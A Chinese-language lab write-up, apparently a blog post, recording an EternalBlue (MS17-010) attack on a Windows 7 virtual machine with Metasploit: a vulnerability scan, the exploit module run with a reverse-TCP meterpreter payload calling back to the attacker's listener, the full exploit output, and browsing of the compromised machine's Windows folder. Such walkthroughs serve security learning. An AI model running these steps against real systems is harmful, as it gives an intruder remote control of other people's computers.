记录一次永恒之蓝漏洞的利用（虚拟机环境）

目标机信息,操作系统。

启动MSF

bash 复制代码

use auxiliary/scanner/smb/smb_ms17_010

bash 复制代码

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                     Required  Description
   ----         ---------------                     --------  -----------
   CHECK_ARCH   true                                no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                               no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/da  yes       List of named pipes to check
                ta/wordlists/named_pipes.txt
   RHOSTS                                           yes       The target host(s), see https://docs.metasploit.com/docs/usi
                                                              ng-metasploit/basics/using-metasploit.html
   RPORT        445                                 yes       The SMB service port (TCP)
   SMBDomain    .                                   no        The Windows domain to use for authentication
   SMBPass                                          no        The password for the specified username
   SMBUser                                          no        The username to authenticate as
   THREADS      1                                   yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.150.168
rhost => 192.168.150.168
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.150.168:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.150.168:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

存在漏洞。

利用漏洞

复制代码

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
                                             ics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows
                                              Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Ser
                                             ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
                                             2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.150.130  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.150.168
rhosts => 192.168.150.168
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.150.130:4444 
[*] 192.168.150.168:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.150.168:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.150.168:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.150.168:445 - The target is vulnerable.
[*] 192.168.150.168:445 - Connecting to target for exploitation.
[+] 192.168.150.168:445 - Connection established for exploitation.
[+] 192.168.150.168:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.150.168:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.150.168:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.150.168:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.150.168:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.150.168:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.150.168:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.150.168:445 - Sending all but last fragment of exploit packet
[*] 192.168.150.168:445 - Starting non-paged pool grooming
[+] 192.168.150.168:445 - Sending SMBv2 buffers
[+] 192.168.150.168:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.150.168:445 - Sending final SMBv2 buffers.
[*] 192.168.150.168:445 - Sending last fragment of exploit packet!
[*] 192.168.150.168:445 - Receiving response from exploit packet
[+] 192.168.150.168:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.150.168:445 - Sending egg to corrupted connection.
[*] 192.168.150.168:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.150.168
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.150.130:4444 -> 192.168.150.168:49172) at 2023-11-08 16:43:52 +0800

meterpreter >

成功进入 meterpreter

bash 复制代码

meterpreter > cd
Usage: cd directory
meterpreter > cd C:
meterpreter > pwd
C:\Windows
meterpreter > cd 
cd AppCompat\\                   cd Offline\ Web\ Pages\\         cd Vss\\
cd AppPatch\\                    cd PLA\\                         cd Web\\
cd Boot\\                        cd Panther\\                     cd addins\\
cd Branding\\                    cd Performance\\                 cd assembly\\
cd Cursors\\                     cd PolicyDefinitions\\           cd debug\\
cd DigitalLocker\\               cd Prefetch\\                    cd diagnostics\\
cd Downloaded\ Program\ Files\\  cd Registration\\                cd en-US\\
cd Fonts\\                       cd Resources\\                   cd inf\\
cd Globalization\\               cd SchCache\\                    cd rescache\\
cd Help\\                        cd ServiceProfiles\\             cd schemas\\
cd IME\\                         cd Setup\\                       cd security\\
cd Installer\\                   cd SoftwareDistribution\\        cd servicing\\
cd L2Schemas\\                   cd Speech\\                      cd system\\
cd LiveKernelReports\\           cd SysWOW64\\                    cd tracing\\
cd Logs\\                        cd System32\\                    cd twain_32\\
cd Media\\                       cd TAPI\\                        cd winsxs\\
cd Microsoft.NET\\               cd Tasks\\                       cd zh-CN\\
cd ModemLogs\\                   cd Temp\\                        
meterpreter > cd